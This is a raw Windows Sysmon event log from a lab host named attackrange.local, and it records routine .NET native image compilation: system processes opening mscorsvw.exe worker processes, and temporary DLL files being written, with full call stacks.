13:48:12.576{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.576{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.576{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DC02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.514{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DC02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.514{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DC02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:12.467{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a94-0\System.Windows.Input.Manipulations.dll2021-01-18 13:48:12.467 10341000x80000000000000007090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.342{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.326{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.326{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.295{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DA02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.279{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DA02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.279{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DA02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:12.217{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b10-0\System.Windows.Forms.DataVisualization.Design.dll2021-01-18 13:48:12.217 10341000x80000000000000007083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.061{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.045{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.045{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-D902-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:11.998{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-D802-00000000A301}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:11.998{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-D802-00000000A301}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:11.998{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-D802-00000000A301}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:13.060{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:13.045{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:13.045{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919D-6005-DF02-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.264{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.248{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.248{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:15.170{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919F-6005-E002-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 